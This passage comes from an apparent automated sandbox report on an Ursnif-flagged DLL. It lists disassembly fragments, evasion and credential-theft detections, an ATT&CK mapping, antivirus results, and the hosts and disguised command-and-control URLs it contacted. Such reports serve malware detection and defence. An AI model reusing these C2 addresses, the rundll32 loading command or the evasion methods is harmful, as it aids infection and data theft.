            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C203AC push dword ptr [esp+0Ch]; ret 0_2_00C203BF
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C203AC push dword ptr [esp+10h]; ret 0_2_00C20404
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C20066 push dword ptr [ebp-000000D8h]; ret 0_2_00C2009B
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C20005 push dword ptr [ebp-000000D8h]; ret 0_2_00C20065
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_004021C3 push ecx; ret 2_2_004021D3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00402170 push ecx; ret 2_2_00402179
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005121C3 push ecx; ret 3_2_005121D3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00512170 push ecx; ret 3_2_00512179
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0408B0CB push ecx; ret 3_2_0408B0DB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0408AD10 push ecx; ret 3_2_0408AD19
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005D0066 push dword ptr [ebp-000000D8h]; ret 3_2_005D009B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005D0005 push dword ptr [ebp-000000D8h]; ret 3_2_005D0065
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005D009C push dword ptr [ebp-000000D8h]; ret 3_2_005D0252
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005D009C push dword ptr [ebp-000000E0h]; ret 3_2_005D029C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005D009C push dword ptr [esp+10h]; ret 3_2_005D03AB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005D03AC push dword ptr [esp+0Ch]; ret 3_2_005D03BF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005D03AC push dword ptr [esp+10h]; ret 3_2_005D0404
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_047BB0CB push ecx; ret 6_2_047BB0DB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_047BD341 pushfd ; retf 6_2_047BD342
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_047BAD10 push ecx; ret 6_2_047BAD19
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04BFB0CB push ecx; ret 9_2_04BFB0DB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04BFAD10 push ecx; ret 9_2_04BFAD19
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04C0B0CB push ecx; ret 12_2_04C0B0DB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04C0AD10 push ecx; ret 12_2_04C0AD19

            Hooking and other Techniques for Hiding and Protection:

            Yara detected Ursnif
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 2880, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3556, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5040, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2624, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5352, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6276, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6536, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6708, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7000, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1496, type: MEMORYSTR
            Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Found stalling execution ending in API Sleep call
            Source: C:\Windows\SysWOW64\rundll32.exe Stalling execution: Execution stalls by calling Sleep
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2620 Thread sleep count: 170 > 30
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2620 Thread sleep time: -85000s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\loaddll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00C732BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_040832BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_047B32BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_04BF32BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_04C032BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_043532BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_067732BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04FD32BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00C2009C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00C203AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00C20476 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_005D0476 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_005D009C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_005D03AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0098009C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00980476 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_009803AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_045A0476 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_045A009C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_045A03AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll',#1
            Source: loaddll32.exe, 00000000.00000002.523347599.00000000011C0000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.525806638.0000000003620000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.524902002.0000000002BC0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
            Source: loaddll32.exe, 00000000.00000002.523347599.00000000011C0000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.525806638.0000000003620000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.524902002.0000000002BC0000.00000002.00020000.sdmp Binary or memory string: Progman
            Source: loaddll32.exe, 00000000.00000002.523347599.00000000011C0000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.525806638.0000000003620000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.524902002.0000000002BC0000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
            Source: loaddll32.exe, 00000000.00000002.523347599.00000000011C0000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.525806638.0000000003620000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.524902002.0000000002BC0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
            Source: loaddll32.exe, 00000000.00000002.523347599.00000000011C0000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.525806638.0000000003620000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.524902002.0000000002BC0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00C793D5 cpuid
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_005F179C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_005F10FC GetSystemTimeAsFileTime,_aulldiv,_snwprintf,wvsprintfA,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00C793D5 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree

            Stealing of Sensitive Information:

            Yara detected Ursnif
            Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 2880, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 3556, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5040, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2624, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5352, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6276, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6536, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6708, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7000, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1496, type: MEMORYSTR

            Remote Access Functionality:

            Yara detected Ursnif
            Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 2880, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 3556, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5040, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2624, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5352, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6276, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6536, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6708, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7000, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1496, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Windows Management Instrumentation (2) | DLL Side-Loading (1) | Process Injection (12) | Masquerading (1) | OS Credential Dumping | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Encrypted Channel (11) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Native API (1) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (1) | LSASS Memory | Query Registry (1) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection (12) | Security Account Manager | Virtualization/Sandbox Evasion (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information (1) | NTDS | Process Discovery (2) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (3) | SIM Card Swap |  | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Regsvr32 (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll32 (1) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing (1) | DCSync | File and Directory Discovery (2) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (13) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue

            Behavior Graph

            [Behavior graph image. Behavior Graph ID: 481120, Sample: MGrYFpGLQ7.dll, Startdate: 10/09/2021, Architecture: WINDOWS, Score: 88]


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            MGrYFpGLQ7.dll | 82% | Virustotal |
            MGrYFpGLQ7.dll | 59% | Metadefender |
            MGrYFpGLQ7.dll | 89% | ReversingLabs | Win32.Ransomware.Sodinokibi
            MGrYFpGLQ7.dll | 100% | Avira | TR/AD.Ursnif.olrue
            MGrYFpGLQ7.dll | 100% | Joe Sandbox ML |

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            Source | Detection | Scanner | Label
            3.1.rundll32.exe.510000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            16.2.rundll32.exe.4350000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
            0.1.loaddll32.exe.5f0000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            3.2.rundll32.exe.510000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
            2.2.regsvr32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
            21.1.rundll32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            27.2.rundll32.exe.4ca0000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
            0.2.loaddll32.exe.5f0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
            18.1.rundll32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            2.1.regsvr32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            12.1.rundll32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            27.1.rundll32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            0.1.loaddll32.exe.5f0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            16.1.rundll32.exe.8f0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            3.2.rundll32.exe.4080000.2.unpack | 100% | Avira | HEUR/AGEN.1108168
            12.2.rundll32.exe.4c00000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
            21.2.rundll32.exe.4fd0000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
            6.2.rundll32.exe.47b0000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
            9.2.rundll32.exe.4bf0000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
            3.1.rundll32.exe.510000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            18.2.rundll32.exe.6770000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
            0.2.loaddll32.exe.c70000.2.unpack | 100% | Avira | HEUR/AGEN.1108168
            0.1.loaddll32.exe.5f0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            9.1.rundll32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            6.1.rundll32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            2.2.regsvr32.exe.3180000.2.unpack | 100% | Avira | HEUR/AGEN.1108168
            16.1.rundll32.exe.8f0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

            Domains

            No Antivirus matches

            URLs

            Source | Detection | Scanner | Label
            http://ocsp.sca1b.amazontrust.com/images/GCf_2BVR4BU/cjyHO8rEu0PLMD/ddrHkS9VDXWI2BqJDWdKp/yP_2BPG48oRDpm0g/SrPkMCydca7dHbV/D9P1tAQMBBq8SvLL_2/BTpaf4v7U/VLIzcVH0j4WxrbYHQOZI/wYP1aj2dECCu_2F_2BC/mIwNPWeBCD7IMCmF8HTTO6/vdW_2F0_2BicH/w8p9PjDD/HtrueVxg_2FcH01kfOOydSo/XvV_2FKbIAaOsHpHpe/wMhAw.avi | 0% | Avira URL Cloud | safe
            http://ocsp.sca1b.amazontrust.com/images/GosV5rx1jUm_2/FeMYZexn/3AHfZUbwKtZ24NdOcSq0RlX/SFVlCboKYZ/q19iLR0UiFTMXXHua/7HDwQVQwW_2B/P2MZpE_2Fn2/TKqFG_2F5mAVKf/ACPvjzozYdfDpfYzdrt73/e9vTiEyeXLfMugv6/YOqbGPGETO_2FyR/6XOvuQnB29hcTxcqfB/1cP6Y9M6Q/pKhEyMS_2BB/ySEZOj.avi | 0% | Avira URL Cloud | safe
            http://ocsp.sca1b.amazontrust.com/images/U6TeZm2GqJwloJv5oZSeI/2t0wwSFx0OdeCqwq/a5th_2BJswZzpBo/iTJZVc_2BHgWPPB64R/K3cCyKXGA/pha07BC_2FbaaosXoWHU/mqeKc0qKA2IsvzCoLJ0/i_2FxmVXC6GOzmCalRHRBS/X4qBHSkzHz0Gv/sQEy9HR7/NTPicd5UJLmarL1TQsRZspC/zIbC4QSojh/SXfsKqnthINSBZ4Hv/INUqZbTg0z/T.avi | 0% | Avira URL Cloud | safe

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            contextual.media.net | 23.211.6.95 | true | false |  | high
            ocsp.sca1b.amazontrust.com | 13.225.29.132 | true | false |  | high
            gstatistics.co | 185.186.142.136 | true | false |  | high
            hblg.media.net | 23.211.6.95 | true | false |  | high
            lg3.media.net | 23.211.6.95 | true | false |  | high
            geolocation.onetrust.com | 104.20.184.68 | true | false |  | high
            edge.gycpi.b.yahoodns.net | 87.248.118.22 | true | false |  | high
            s.yimg.com | unknown | unknown | false |  | high
            web.vortex.data.msn.com | unknown | unknown | false |  | high
            www.msn.com | unknown | unknown | false |  | high
            srtb.msn.com | unknown | unknown | false |  | high
            cvision.media.net | unknown | unknown | false |  | high

                                    Contacted URLs

                                    Name | Malicious | Antivirus Detection | Reputation
                                    http://ocsp.sca1b.amazontrust.com/images/GCf_2BVR4BU/cjyHO8rEu0PLMD/ddrHkS9VDXWI2BqJDWdKp/yP_2BPG48oRDpm0g/SrPkMCydca7dHbV/D9P1tAQMBBq8SvLL_2/BTpaf4v7U/VLIzcVH0j4WxrbYHQOZI/wYP1aj2dECCu_2F_2BC/mIwNPWeBCD7IMCmF8HTTO6/vdW_2F0_2BicH/w8p9PjDD/HtrueVxg_2FcH01kfOOydSo/XvV_2FKbIAaOsHpHpe/wMhAw.avi | true | Avira URL Cloud: safe | unknown
                                    https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location | false |  | high
                                    http://ocsp.sca1b.amazontrust.com/images/GosV5rx1jUm_2/FeMYZexn/3AHfZUbwKtZ24NdOcSq0RlX/SFVlCboKYZ/q19iLR0UiFTMXXHua/7HDwQVQwW_2B/P2MZpE_2Fn2/TKqFG_2F5mAVKf/ACPvjzozYdfDpfYzdrt73/e9vTiEyeXLfMugv6/YOqbGPGETO_2FyR/6XOvuQnB29hcTxcqfB/1cP6Y9M6Q/pKhEyMS_2BB/ySEZOj.avi | true | Avira URL Cloud: safe | unknown
                                    https://s.yimg.com/lo/api/res/1.2/BWUYr.M5U6.kf035wsX8Lg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1pbmk7cT0xMDA-/https://s.yimg.com/av/ads/1621266752856-586.jpg | false |  | high
                                    http://ocsp.sca1b.amazontrust.com/images/U6TeZm2GqJwloJv5oZSeI/2t0wwSFx0OdeCqwq/a5th_2BJswZzpBo/iTJZVc_2BHgWPPB64R/K3cCyKXGA/pha07BC_2FbaaosXoWHU/mqeKc0qKA2IsvzCoLJ0/i_2FxmVXC6GOzmCalRHRBS/X4qBHSkzHz0Gv/sQEy9HR7/NTPicd5UJLmarL1TQsRZspC/zIbC4QSojh/SXfsKqnthINSBZ4Hv/INUqZbTg0z/T.avi | true | Avira URL Cloud: safe | unknown

                                        Contacted IPs

                                        Public

                                        IP | Domain | Country | ASN | ASN Name | Malicious
                                        13.225.29.132 | ocsp.sca1b.amazontrust.com | United States | 16509 | AMAZON-02US | false
                                        104.20.184.68 | geolocation.onetrust.com | United States | 13335 | CLOUDFLARENETUS | false
                                        95.181.198.158 | unknown | Russian Federation | 49063 | DTLNRU | false
                                        87.248.118.22 | edge.gycpi.b.yahoodns.net | United Kingdom | 203220 | YAHOO-DEBDE | false
                                        185.186.142.136 | gstatistics.co | Russian Federation | 204490 | ASKONTELRU | false

                                        Private

                                        IP
                                        192.168.2.1

                                        General Information

                                        Joe Sandbox Version:33.0.0 White Diamond
                                        Analysis ID:481120
                                        Start date:10.09.2021
                                        Start time:11:32:24
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 14m 24s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:MGrYFpGLQ7.dll
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:46
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal88.troj.evad.winDLL@51/187@14/6
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:
                                        • Successful, ratio: 74.4% (good quality ratio 69.8%)
                                        • Quality average: 78.1%
                                        • Quality standard deviation: 29.8%
                                        HCA Information:
                                        • Successful, ratio: 84%
                                        • Number of executed functions: 216
                                        • Number of non-executed functions: 270
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .dll
                                        Warnings:
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 23.203.80.193, 204.79.197.203, 131.253.33.200, 13.107.22.200, 80.67.82.240, 80.67.82.209, 23.211.4.86, 65.55.44.109, 23.211.6.95, 20.50.102.62, 152.199.19.161, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.82.210.154
                                        • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, fs.microsoft.com, ie9comview.vo.msecnd.net, a-0003.a-msedge.net, cvision.media.net.edgekey.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, www-msn-com.a-0003.a-msedge.net, a1999.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, cs9.wpc.v0cdn.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtSetInformationFile calls found.

                                        Simulations

                                        Behavior and APIs

                                        No simulations

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASN

                                        No context

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DURNCK2N\www.msn[2].xml
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):13
                                        Entropy (8bit):2.469670487371862
                                        Encrypted:false
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: <root></root>
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\QALADACS\contextual.media[1].xml
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with very long lines, with no line terminators
                                        Category:dropped
                                        Size (bytes):1979
